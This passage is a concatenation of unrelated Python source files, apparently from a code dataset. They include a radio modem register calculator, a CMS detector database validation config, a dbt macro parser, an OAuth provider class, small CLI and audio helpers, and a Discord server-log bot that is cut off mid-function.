self._reg_write(model.vars.MODEM_BCRDEMODRSSI_RSSIMATAP, 0) # Write BCRDEMODARR0 self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDLO, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHPRDHI, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRRSTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRTOLER, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_DIFF0RSTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETTHD, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_SCHFRZEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEXESTFAST, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRDETSRC, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_EYEQUALEN, 0) # Write BCRDEMODARR1 self._reg_write(model.vars.MODEM_BCRDEMODARR1_ARREYEQUAL, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_BCRCFESRC, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR1_KSICOMPEN, 0) # Write BCRDEMODARR2 self._reg_write(model.vars.MODEM_BCRDEMODARR2_RAWDCHKALWAYON, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR2_CONSYMOL, 0) # Write BCRDEMODKSI self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI1, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI2, 0) self._reg_write(model.vars.MODEM_BCRDEMODKSI_BCRKSI3, 0) # Write BCRDEMODPMEXP self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPHSCALE, 0) self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMEXP, 0) def calc_bcr_demod_en(self,model): #This function writes the BCR demod enable register # Load model values into local variables demod_select = model.vars.demod_select.value if (demod_select == model.vars.demod_select.var_enum.BCR): bcr_demod_en = 1 else: bcr_demod_en = 0 #Write the register values model.vars.bcr_demod_en.value = bcr_demod_en def calc_bcr_demod_en_reg(self,model): bcr_demod_en = model.vars.bcr_demod_en.value self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BCRDEMODEN, bcr_demod_en) def calc_pro2_dsa_mode(self,model): preamble_detection_length = model.vars.preamble_detection_length.value mod_type = model.vars.pro2_modulation_type.value antdivmode = model.vars.antdivmode.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if not ber_force_fdm0: if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV \ or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pro2_dsa_mode = 1 # : always enable dsa mode for antenna diversity elif (mod_type == 1): ## OOK or ASK #Enable for short preamble lengths if preamble_detection_length < 20: pro2_dsa_mode = 1 else: pro2_dsa_mode = 0 else: if (16 <= preamble_detection_length < 48) : pro2_dsa_mode = 1 else: pro2_dsa_mode = 0 else: #Disable DSA for BER testing pro2_dsa_mode = 0 # Load local variables back into model variables model.vars.pro2_dsa_mode.value = pro2_dsa_mode def calc_pro2_afc_mode(self,model): # This function calculates the AFC mode for the pro2 calculator # Load model values into local variables preamble_detection_length = model.vars.preamble_detection_length.value mod_type = model.vars.pro2_modulation_type.value antdivmode = model.vars.antdivmode.value ber_force_freq_comp_off = model.vars.ber_force_freq_comp_off.value if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV \ or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pro2_afc_mode = 2 # if (preamble_detection_length >= 32): # AFC correction value is fed back to PLL in a pre-defined rate and the internal modem frequency compensation is running until the preamble is detected # pro2_afc_mode = 1 elif (16 <= preamble_detection_length < 48) and ( mod_type!= 1) and not ber_force_freq_comp_off: #AFC correction value is fed back to PLL just once while signal arrival detection is triggered and a pre-defined delay timer will be armed. # The internal modem frequency compensation is running until this delay timer is timeout. pro2_afc_mode = 2 else: # AFC correction value is not fed back to PLL. The internal modem frequency compensation will be frozen once the preamble is detected. pro2_afc_mode = 0 # Load local variables back into model variables model.vars.pro2_afc_mode.value = pro2_afc_mode def calc_pro2_osr_tune(self,model): # This function calculates the OSR tune value for the pro2 calculator # For now, just set this to a static 0 # TODO 32: Decide how we want to divide the decimation between dec0/1/osrtune # Load local variables back into model variables model.vars.pro2_osr_tune.value = 0 def calc_pro2_modulation_type(self,model): #This function calculates the pro2 modulation type input # Load model values into local variables mod_type = model.vars.modulation_type.value shaping_filter = model.vars.shaping_filter.value pro2_modulation_type = 1 #OOK by default if (mod_type == model.vars.modulation_type.var_enum.OOK) or (mod_type == model.vars.modulation_type.var_enum.ASK): pro2_modulation_type = 1 elif (mod_type == model.vars.modulation_type.var_enum.FSK2) or \ (mod_type == model.vars.modulation_type.var_enum.MSK): if (shaping_filter == model.vars.shaping_filter.var_enum.Gaussian): pro2_modulation_type = 3 else: pro2_modulation_type = 2 elif (mod_type == model.vars.modulation_type.var_enum.FSK4): if (shaping_filter == model.vars.shaping_filter.var_enum.Gaussian): pro2_modulation_type = 5 else: pro2_modulation_type = 4 # Load local variables back into model variables model.vars.pro2_modulation_type.value = pro2_modulation_type def calc_pro2_pm_pattern(self,model): # This function calculates the preamble pattern value for the pro2 calculator # May add additional preamble pattern cases later, for now this is sufficient # Load model values into local variables preamble_detection_length = model.vars.preamble_detection_length.value preamble_pattern = model.vars.preamble_pattern.value preamble_pattern_len_actual = model.vars.preamble_pattern_len_actual.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if (preamble_detection_length >= 32) and not ber_force_fdm0: if ((preamble_pattern == 1) or (preamble_pattern==2)) and (preamble_pattern_len_actual == 2): # 1010 or 0101 repeating pro2_pm_pattern = 0 elif ((preamble_pattern == 1) and (preamble_pattern_len_actual == 1)) or ((preamble_pattern == 3) and (preamble_pattern_len_actual == 2)): # 1111 repeating pro2_pm_pattern = 1 elif (preamble_pattern == 0): # 0000 repeating pro2_pm_pattern = 2 else: # Any other sequence pro2_pm_pattern = 3 elif (preamble_detection_length >= 16) and not ber_force_fdm0: if ((preamble_pattern == 1) or (preamble_pattern==2)) and (preamble_pattern_len_actual == 2): # 1010 or 0101 repeating pro2_pm_pattern = 100 else: # Any other sequence pro2_pm_pattern = 150 else: #Any shorter sequence pro2_pm_pattern = 1000 # Load local variables back into model variables model.vars.pro2_pm_pattern.value = pro2_pm_pattern def calc_pro2_antdiv(self,model): # This function calculates the pro2 antenna diversity enable # Load model values into local variables antdivmode = model.vars.antdivmode.value if (antdivmode == 0): pro2_ant_div = 0 else: pro2_ant_div = 1 # Load local variables back into model variables model.vars.pro2_ant_div.value = pro2_ant_div def calc_pro2_fs_rx_ch(self,model): # This function calculates the Pro2 calculator input value for API_Fs_rx_CH # Load model values into local variables adc_freq_actual = model.vars.adc_freq_actual.value dec0_actual = model.vars.dec0_actual.value dec1_actual = model.vars.dec1_actual.value src2_actual = model.vars.src2_ratio_actual.value bcr_detector_en = model.vars.MODEM_PHDMODCTRL_BCRDETECTOR.value #Calculate a few more variables dec8 = 8 if bcr_detector_en: pro2_fs_rx_ch = int(adc_freq_actual*src2_actual/dec8/dec0_actual/dec1_actual) else: pro2_fs_rx_ch = int(adc_freq_actual/dec8/dec0_actual/dec1_actual) # Load local variables back into model variables model.vars.pro2_fs_rx_ch.value = pro2_fs_rx_ch def calc_bcr_demod_ksi3_and_phscale(self,model): # This function calculates the KSI3 value for the BCR demod # Load model values into local variables calculated_phscale = model.vars.MODEM_TRECPMDET_PHSCALE.value ksi3wb_actual = model.vars.ksi3wb.value model.vars.calculated_ksi3.value = int(round(ksi3wb_actual)) model.vars.calculated_phscale.value = calculated_phscale def calc_bcr_demod_ook_pkd_thd(self,model): # This function calculates the OOK peak detector thrd # Load model values into local variables mod_type = model.vars.pro2_modulation_type.value shaping_filter_mode = model.vars.MODEM_CTRL0_SHAPING.value model.vars.calculated_bw_peak.value = 12 if (shaping_filter_mode != 0) and (mod_type == 1): ## OOK or ASK model.vars.calculated_bw_peak.value = 18 def calc_bcr_invrxbit(self,model): # Reading variables from model variables fskmap = model.vars.MODEM_CTRL0_MAPFSK.value mod_type = model.vars.modulation_type.value #Assigning INVRXBIT the appropiate value based on existing FSKMAP variable if (mod_type == model.vars.modulation_type.var_enum.FSK2): invrxbit = fskmap else: invrxbit = 0 self._reg_write(model.vars.MODEM_BCRDEMODCTRL_INVRXBIT, invrxbit) def calc_bcr_manchph(self,model): # Reading variables from model variables manchester_mapping = model.vars.manchester_mapping.value symbol_encoding = model.vars.symbol_encoding.value demod_select = model.vars.demod_select.value # Assigning MANCHPH the appropiate value based on existing symbol encoding and manchester mapping if (symbol_encoding == model.vars.symbol_encoding.var_enum.Inv_Manchester) and (demod_select == model.vars.demod_select.var_enum.BCR): manchph = 1 else: manchph = 0 self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHPH, manchph) def calc_eyeopenthd_reg(self, model): phscale = model.vars.phscale_actual.value ksi3 = model.vars.calculated_ksi3.value demod_select = model.vars.demod_select.value if (demod_select == model.vars.demod_select.var_enum.BCR): eyeopenthd = int(4 * ksi3 * phscale) else: eyeopenthd = 0 self._reg_write(model.vars.MODEM_BCRDEMODARR1_EYEOPENTHD, eyeopenthd) def calc_bbpmdeten_arrqpm(self, model): # Reading variables from model variables encfequal_actual = model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL.value demod_select = model.vars.demod_select.value en2TB_est = model.vars.MODEM_BCRDEMODAFC0_EN2TBEST.value estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value if (encfequal_actual == 1) and (demod_select == model.vars.demod_select.var_enum.BCR): # : Based on 2FSK low modulation index and preamble len < 48 investigation # : Floor issue is resolved by disabling BBPMDET mode and using BT preamble detection mode. # : https://jira.silabs.com/browse/MCUW_RADIO_CFG-1440 if en2TB_est == 0: self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 1) else: self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 0) self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRQPM, 1) else: self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRQPM, 0) self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 0) def calc_freq_dev_min(self, model): # Reading variables from model variables fdeverror = model.vars.deviation_tol_ppm.value deviation = model.vars.deviation.value freq_dev_min = int(deviation - (fdeverror * deviation) / 1000000) model.vars.freq_dev_min.value = freq_dev_min def calc_freq_dev_max(self, model): # Reading variables from model variables fdeverror = model.vars.deviation_tol_ppm.value deviation = model.vars.deviation.value freq_dev_max = int(deviation + (fdeverror * deviation) / 1000000) model.vars.freq_dev_max.value = freq_dev_max def calc_bcr_cfe_costthd(self,model): antdivmode = model.vars.antdivmode.value if model.vars.bcr_demod_en.value == 1: #Need to read in these variables inside of the if statement as some are don't care if BCR disabled calculated_bcrpmacqwin = model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN.value if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: bcr_cfe_costthd = 150 # If antdiv enabled, bcrpmacqwin is always 2 so the cost thd is constant. else: bcr_cfe_costthd = int(round(215 - (3 - calculated_bcrpmacqwin) * 60)) else: bcr_cfe_costthd = 255 self._reg_sat_write(model.vars.MODEM_BCRDEMODPMEXP_BCRCFECOSTTHD, bcr_cfe_costthd) #We always care about this def calc_bcr_symbwmax(self, model): pro2_dsa_en = model.vars.pro2_dsa_mode.value estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value bcr_osr_actual = model.vars.MODEM_BCRCTRL1_BCROSR.value bcr_osr_trunc = bcr_osr_actual >> 6 if pro2_dsa_en == 0: symbwmin = 0 symbwmax = 31 elif bcr_osr_trunc == 0: # : for low BCR OSR, keep short symbol width symbwmax = 4 symbwmin = 1 else: # : Ensure that for mbus case with long preamble has long symbwmax if estosren_actual == 1: symbwmax = 8 symbwmin = 2 else: # : Based on 2-FSK with estoren disabled test, sybwmax needs to be set lower to reduce floor near AGC # : adjustment region (floor around -50 dBm) symbwmax = 6 symbwmin = 2 if model.vars.bcr_demod_en.value == 1: self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN, symbwmin) self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX, symbwmax) else: self._reg_do_not_care(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN) self._reg_do_not_care(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX) def calc_bcr_cfeschwin(self, model): preamble_detection_length = model.vars.preamble_detection_length.value estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if (preamble_detection_length < 32) or ber_force_fdm0: # : for short preamble, keep CFE window short bcrcfeschwin = 3 elif 32 <= preamble_detection_length < 40: if estosren_actual == 1: # : For mbus case with long preamble, keep CFE window short bcrcfeschwin = 3 else: # : Based on 2-FSK with estoren disabled test, keep CFE window long to reduce floor near AGC # : adjutment region (floor around -50 dBm). bcrcfeschwin = 4 else: # : for long preamble, keep CFE window long bcrcfeschwin = 4 if model.vars.bcr_demod_en.value == 1: self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN, bcrcfeschwin) else: self._reg_do_not_care(model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN) def calc_bcr_cfequalthd(self, model): if model.vars.bcr_demod_en.value == 1: #Need to read this model variable inside the if statement as it may be set to dont care if BCR disabled bcrcfeschwin_actual = model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN.value # : zero crossing qualified threshold is recommended by Wentao to be set as CFE window minus 1 if bcrcfeschwin_actual > 0: cfequalthd = bcrcfeschwin_actual - 1 else: cfequalthd = 0 else: cfequalthd = 7 self._reg_write(model.vars.MODEM_BCRDEMODARR1_CFEQUALTHD, cfequalthd) #We always care about this field def calc_bcr_pmacqwin(self, model): preamble_detection_length = model.vars.preamble_detection_length.value estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value antdivmode = model.vars.antdivmode.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pmacqwin = 2 # : If antdiv mode enabled, keep window short so that shorter preamble length can be used elif (preamble_detection_length < 32) or ber_force_fdm0: # : for short preamble, keep preamble window short pmacqwin = 2 elif 32 <= preamble_detection_length < 40: if estosren_actual == 1: pmacqwin = 2 else: pmacqwin = 3 else: pmacqwin = 3 if model.vars.bcr_demod_en.value == 1: self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN, pmacqwin) else: self._reg_do_not_care(model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN) def calc_bcrdemodook_noiseflest_abpk_regs(self, model): #This function programs the BCRDEMODOOK_NOISEFLEST and BCRDEMODOOK_ABPK fields #Read in model variables modulation_type = model.vars.modulation_type.value preamble_detection_length = model.vars.preamble_detection_length.value #Set the register value based on mod type and preamble length if (modulation_type == model.vars.modulation_type.var_enum.OOK or modulation_type == model.vars.modulation_type.var_enum.ASK) and preamble_detection_length < 20: #OOK with short preamble case noiseflest = 1 abpk = 4 else: noiseflest = 0 abpk = 0 #Write the register self._reg_write(model.vars.MODEM_BCRDEMODOOK_NOISEFLEST, noiseflest) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ABPK, abpk)
11589525
def diff_brute(n, l): count = 0 for c1, i in enumerate(l): for c2, j in enumerate(l): if abs(i-j) == n and c1 != c2: count += 1 return count/2 def diff(n, l): """ Runtime: O(n) """ occurences = {} count = 0 for i in l: if i in occurences.keys(): occurences[i] += 1 else: occurences[i] = 1 for i in occurences.keys(): if i + n in occurences.keys(): c1 = occurences[i] c2 = occurences[i+n] count += c1 * c2 return count print diff(4, [1, 1, 5, 6, 9, 16, 27]) # 3 (Due to 2x [1, 5], and [5, 9]) print diff(2, [1, 1, 3, 3]) # 4 (Due to 4x [1, 3])
11589560
import FWCore.ParameterSet.Config as cms class config: pass config.runNumber = 1 config.refTag = 'DT_t0_cosmic2009_V01_express' config.t0DB = 't0.db' config.dataset = '/MiniDaq/Run2011A-v1/RAW' config.outputdir = 'DQM' config.trial = 1 # Further config. dataset_vec = config.dataset.split('/') config.workflowName = '/%s/%s-dtT0DBValidation-rev%d/%s' % (dataset_vec[1], dataset_vec[2], config.trial, dataset_vec[3]) process = cms.Process("DBValidation") process.MessageLogger = cms.Service("MessageLogger", debugModules = cms.untracked.vstring('dtT0Analyzer'), cerr = cms.untracked.PSet( default = cms.untracked.PSet( limit = cms.untracked.int32(0) ), InterChannelSynchDBValidation = cms.untracked.PSet( limit = cms.untracked.int32(10000000) ), threshold = cms.untracked.string('DEBUG'), DEBUG = cms.untracked.PSet( limit = cms.untracked.int32(0) ) ), categories = cms.untracked.vstring('InterChannelSynchDBValidation'), destinations = cms.untracked.vstring('cerr') ) process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load("Geometry.DTGeometry.dtGeometry_cfi") process.DTGeometryESModule.applyAlignment = False process.load("DQMServices.Core.DQM_cfg") process.load("DQMServices.Components.DQMEnvironment_cfi") process.source = cms.Source("EmptySource", numberEventsInRun = cms.untracked.uint32(1), firstRun = cms.untracked.uint32(config.runNumber) ) process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) ) process.tzeroRef = cms.ESSource("PoolDBESSource", DBParameters = cms.PSet( messageLevel = cms.untracked.int32(0), authenticationPath = cms.untracked.string('/afs/cern.ch/cms/DB/conddb') ), timetype = cms.string('runnumber'), connect = cms.string('oracle://cms_orcoff_prod/CMS_COND_31X_DT'), toGet = cms.VPSet( cms.PSet( record = cms.string('DTT0Rcd'), tag = cms.string(config.refTag), label = cms.untracked.string('tzeroRef') ), cms.PSet( record = cms.string('DTT0Rcd'), tag = cms.string('t0'), connect = cms.untracked.string('sqlite_file:%s' % config.t0DB), label = cms.untracked.string('tzeroToValidate') ) ), siteLocalConfig = cms.untracked.bool(False) ) process.dtT0Analyzer = cms.EDAnalyzer("DTt0DBValidation", labelDBRef = cms.string('tzeroRef'), labelDB = cms.string('tzeroToValidate'), t0TestName = cms.string('t0DifferenceInRange'), #OutputFileName = cms.untracked.string('t0DBValidation_DT_t0_cosmic2009_V01_express.root') ) from DQMServices.Core.DQMQualityTester import DQMQualityTester process.qTester = DQMQualityTester( prescaleFactor = cms.untracked.int32(1), reportThreshold = cms.untracked.string('black'), qtList = cms.untracked.FileInPath('DQMOffline/CalibMuon/data/QualityTests.xml') ) process.dqmSaver.convention = 'Offline' process.dqmSaver.workflow = config.workflowName process.DQM.collectorHost = '' #process.p = cms.Path(process.dtT0Analyzer*process.qTester*process.dqmSaver) process.p = cms.Path(process.qTester* process.dtT0Analyzer* process.dqmSaver)
11589562
import jinja2 from dbt.clients.jinja import get_environment from dbt.exceptions import raise_compiler_error def statically_extract_macro_calls(string, ctx, db_wrapper=None): # set 'capture_macros' to capture undefined env = get_environment(None, capture_macros=True) parsed = env.parse(string) standard_calls = ['source', 'ref', 'config'] possible_macro_calls = [] for func_call in parsed.find_all(jinja2.nodes.Call): func_name = None if hasattr(func_call, 'node') and hasattr(func_call.node, 'name'): func_name = func_call.node.name else: # func_call for dbt_utils.current_timestamp macro # Call( # node=Getattr( # node=Name( # name='dbt_utils', # ctx='load' # ), # attr='current_timestamp', # ctx='load # ), # args=[], # kwargs=[], # dyn_args=None, # dyn_kwargs=None # ) if (hasattr(func_call, 'node') and hasattr(func_call.node, 'node') and type(func_call.node.node).__name__ == 'Name' and hasattr(func_call.node, 'attr')): package_name = func_call.node.node.name macro_name = func_call.node.attr if package_name == 'adapter': if macro_name == 'dispatch': ad_macro_calls = statically_parse_adapter_dispatch( func_call, ctx, db_wrapper) possible_macro_calls.extend(ad_macro_calls) else: # This skips calls such as adapter.parse_index continue else: func_name = f'{package_name}.{macro_name}' else: continue if not func_name: continue if func_name in standard_calls: continue elif ctx.get(func_name): continue else: if func_name not in possible_macro_calls: possible_macro_calls.append(func_name) return possible_macro_calls # Call( # node=Getattr( # node=Name( # name='adapter', # ctx='load' # ), # attr='dispatch', # ctx='load' # ), # args=[ # Const(value='test_pkg_and_dispatch') # ], # kwargs=[ # Keyword( # key='packages', # value=Call(node=Getattr(node=Name(name='local_utils', ctx='load'), # attr='_get_utils_namespaces', ctx='load'), args=[], kwargs=[], # dyn_args=None, dyn_kwargs=None) # ) # ], # dyn_args=None, # dyn_kwargs=None # ) def statically_parse_adapter_dispatch(func_call, ctx, db_wrapper): possible_macro_calls = [] # This captures an adapter.dispatch('<macro_name>') call. func_name = None # macro_name positional argument if len(func_call.args) > 0: func_name = func_call.args[0].value if func_name: possible_macro_calls.append(func_name) # packages positional argument macro_namespace = None packages_arg = None packages_arg_type = None if len(func_call.args) > 1: packages_arg = func_call.args[1] # This can be a List or a Call packages_arg_type = type(func_call.args[1]).__name__ # keyword arguments if func_call.kwargs: for kwarg in func_call.kwargs: if kwarg.key == 'macro_name': # This will remain to enable static resolution if type(kwarg.value).__name__ == 'Const': func_name = kwarg.value.value possible_macro_calls.append(func_name) else: raise_compiler_error(f"The macro_name parameter ({kwarg.value.value}) " "to adapter.dispatch was not a string") elif kwarg.key == 'macro_namespace': # This will remain to enable static resolution kwarg_type = type(kwarg.value).__name__ if kwarg_type == 'Const': macro_namespace = kwarg.value.value else: raise_compiler_error("The macro_namespace parameter to adapter.dispatch " f"is a {kwarg_type}, not a string") # positional arguments if packages_arg: if packages_arg_type == 'List': # This will remain to enable static resolution packages = [] for item in packages_arg.items: packages.append(item.value) elif packages_arg_type == 'Const': # This will remain to enable static resolution macro_namespace = packages_arg.value if db_wrapper: macro = db_wrapper.dispatch( func_name, macro_namespace=macro_namespace ).macro func_name = f'{macro.package_name}.{macro.name}' possible_macro_calls.append(func_name) else: # this is only for test/unit/test_macro_calls.py if macro_namespace: packages = [macro_namespace] else: packages = [] for package_name in packages: possible_macro_calls.append(f'{package_name}.{func_name}') return possible_macro_calls
11589578
from allauth.socialaccount.providers.base import ProviderAccount from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider class AgaveAccount(ProviderAccount): def get_profile_url(self): return self.account.extra_data.get("web_url", "dflt") def get_avatar_url(self): return self.account.extra_data.get("avatar_url", "dflt") def to_str(self): dflt = super(AgaveAccount, self).to_str() return self.account.extra_data.get("name", dflt) class AgaveProvider(OAuth2Provider): id = "agave" name = "Agave" account_class = AgaveAccount def extract_uid(self, data): return str(data.get("create_time")) def extract_common_fields(self, data): return dict( email=data.get("email"), username=data.get("username", ""), name=( (data.get("first_name", "") + " " + data.get("last_name", "")).strip() ), ) def get_default_scope(self): scope = ["PRODUCTION"] return scope provider_classes = [AgaveProvider]
11589593
from typing import Optional import typer __version__ = "0.1.0" def version_callback(value: bool): if value: typer.echo(f"Awesome CLI Version: {__version__}") raise typer.Exit() def main( name: str = typer.Option("World"), version: Optional[bool] = typer.Option( None, "--version", callback=version_callback ), ): typer.echo(f"Hello {name}") if __name__ == "__main__": typer.run(main)
11589607
from . import monkey # noqa # Sometimes noqa does not disable linter (Spyder IDE) monkey.__package__ from .executors import TaskPool from .scheduler import ( # Scheduler, PersistentScheduler, )
11589641
from pycompat import * from qtutil import * from audioLibs.base import Song try: from PyQt4.phonon import Phonon except ImportError: try: from PyQt5.phonon import Phonon except ImportError: try: from PySide.phonon import Phonon except ImportError: from PySide2.phonon import Phonon class PhononSong(Song): # fallback for when pyglet doesn't work def __init__(self, path): super(PhononSong, self).__init__(path) self.player = Phonon.MediaObject() self.output = Phonon.AudioOutput(Phonon.MusicCategory, None) Phonon.createPath(self.player, self.output) self.song = Phonon.MediaSource(path) self.player.setCurrentSource(self.song) self.tick = None self.player.stateChanged.connect(self.__doSeek) def __doSeek(self, state, __s): if self.tick is None: return if state == Phonon.PlayingState: self.player.seek(self.tick) self.tick = None def seekAndPlay(self, seconds): self.player.play() # seek silently fails if we're still buffering or loading # so let's store what to seek for later if that's the case if self.player.state() != Phonon.PlayingState: self.tick = long(seconds * 1000) return self.player.seek(long(seconds * 1000)) def stop(self): self.player.stop()
11589687
import asyncio import datetime import hashlib import logging import re import textwrap import discord from carim_discord_bot import managed_service, config from carim_discord_bot.discord_client import client from carim_discord_bot.managed_service import Message log = logging.getLogger(__name__) class PlayerCount(managed_service.Message): def __init__(self, server_name, players, slots, queue, time): super().__init__(server_name) self.players = players self.slots = slots self.queue = queue self.time = time class Chat(managed_service.Message): def __init__(self, server_name, content): super().__init__(server_name) self.content = content class Log(managed_service.Message): def __init__(self, server_name, text): super().__init__(server_name) self.text = text class Response(managed_service.Message): def __init__(self, server_name, text): super().__init__(server_name) self.text = text class UserResponse(managed_service.Message): def __init__(self, channel_id, title, text): super().__init__(None) self.channel_id = channel_id self.title = title self.text = text def get_server_color(server_name): color_options = [ 0x9c27b0, 0x3f51b5, 0x2196f3, 0x03a9f4, 0x00bcd4, 0x009688, 0x4caf50, 0x8bc34a, 0xcddc39, 0xffeb3b, 0xffc107, 0xff9800, 0x795548, 0x607d8b ] return color_options[ int.from_bytes(hashlib.sha256(bytes(server_name, encoding='utf-8')).digest()[-4:], 'big') % len( color_options)] def build_fields(server_name, rolled_up_log, formatted=False): messages = [] fields = [] current_field = { 'name': f'**{server_name}**', 'value': '```\n' if formatted else '' } validated_log = [] for log_line in rolled_up_log: validated_log += textwrap.wrap(log_line, 1000) for log_line in validated_log: if sum(get_field_length(f) for f in fields) > 4096: messages.append(fields) fields = [] if not current_field['value'] == '' and get_field_length(current_field) + len(log_line) > 1000: current_field['value'] += '```' fields.append(current_field) current_field = { 'name': f'{server_name}' if formatted else f'**{server_name}**', 'value': '```\n' if formatted else '' } current_field['value'] += log_line + '\n' current_field['value'] += '```' fields.append(current_field) messages.append(fields) return messages def build_formatted_fields(server_name, rolled_up_log): return build_fields(server_name, rolled_up_log, formatted=True) def get_field_length(field): return len(field.get('name', '') + field.get('value', '')) class DiscordService(managed_service.ManagedService): def __init__(self): super().__init__() self.client = None self.log_rollup = {name: list() for name in config.get_server_names()} start_date = datetime.datetime.now().replace(minute=max(0, datetime.datetime.now().minute - 3)) self.last_log_time = {name: start_date for name in config.get_server_names()} self.last_player_count_update = {name: start_date for name in config.get_server_names()} self.player_counts = {name: '' for name in config.get_server_names()} async def stop(self): await self.client.close() sleep_length = 30 log.info(f'sleeping for {sleep_length} seconds') await asyncio.sleep(sleep_length) await super().stop() async def service(self): self.client = client.CarimClient() await self.client.login(config.get().token) asyncio.create_task(self.client.connect()) await self.set_presence() while True: await asyncio.sleep(1) await self.flush_log() async def set_presence(self): if config.get().presence is not None and len(config.get().presence) > 0: if config.get().presence_type == 'watching': activity_type = discord.ActivityType.watching elif config.get().presence_type == 'listening': activity_type = discord.ActivityType.listening else: activity_type = discord.ActivityType.playing activity = discord.Activity(type=activity_type, name=config.get().presence) else: activity = None await self.client.wait_until_ready() await self.client.change_presence(activity=activity) async def handle_message(self, message: Message): await self.client.wait_until_ready() if isinstance(message, PlayerCount): await self.handle_player_count_message(message) elif isinstance(message, Log): log.info(f'log {message.server_name}: {message.text}') self.log_rollup[message.server_name] += f'{message.text}'.split('\n') elif isinstance(message, Response): log.info(f'response {message.server_name}: {message.text}') self.log_rollup[message.server_name] += f'{message.text}'.split('\n') elif isinstance(message, Chat): log.info(f'chat {message.server_name}: {message.content}') channel_id = config.get_server(message.server_name).chat_channel_id if channel_id: if config.get_server(message.server_name).chat_ignore_regex: r = re.compile(config.get_server(message.server_name).chat_ignore_regex) if r.match(message.content): log.info(f'chat ignored {message.server_name}: {message.content}') return channel: discord.TextChannel = self.client.get_channel(channel_id) await channel.send(embed=discord.Embed(description=message.content)) elif isinstance(message, UserResponse): log.info(f'user message {message.channel_id}: {message.text}') channel: discord.TextChannel = self.client.get_channel(message.channel_id) for m in build_formatted_fields(message.title, message.text.split('\n')): embed_dict = { 'color': get_server_color(message.title), 'fields': m } await channel.send(embed=discord.Embed.from_dict(embed_dict)) async def handle_player_count_message(self, message: PlayerCount): if config.get_server(message.server_name).player_count_channel_id: player_count_string = config.get_server(message.server_name).player_count_format.format( players=message.players, slots=message.slots, queue=message.queue, time=message.time) if message.queue != '0': player_count_string += config.get_server(message.server_name).player_count_queue_format.format( players=message.players, slots=message.slots, queue=message.queue, time=message.time ) if self.player_counts[message.server_name] != player_count_string: if datetime.timedelta(minutes=6) < \ datetime.datetime.now() - self.last_player_count_update[message.server_name]: # Rate limit is triggered when updating a channel name too often, so that's why we # put a hard limit on how often the player count channel gets updated channel: discord.TextChannel = self.client.get_channel( config.get_server(message.server_name).player_count_channel_id) await channel.edit(name=player_count_string) self.last_player_count_update[message.server_name] = datetime.datetime.now() self.player_counts[message.server_name] = player_count_string log.info(f'log {message.server_name}: Update player count: {player_count_string}') if config.get().log_player_count_updates: self.log_rollup[message.server_name].append(f'Update player count: {player_count_string}') async def flush_log(self): await self.client.wait_until_ready() for server_name in config.get_server_names(): if self.log_rollup[server_name] and datetime.timedelta(seconds=10) < \ datetime.datetime.now() - self.last_log_time[server_name]: for message in build_fields(server_name, self.log_rollup[server_name]): await self.send_rolled_log(server_name, message) self.last_log_time[server_name] = datetime.datetime.now() self.log_rollup[server_name] = list() async def send_rolled_log(self, server_name, fields): channel: discord.TextChannel = self.client.get_channel( config.get_server(server_name).admin_channel_id) embed_dict = { 'color': 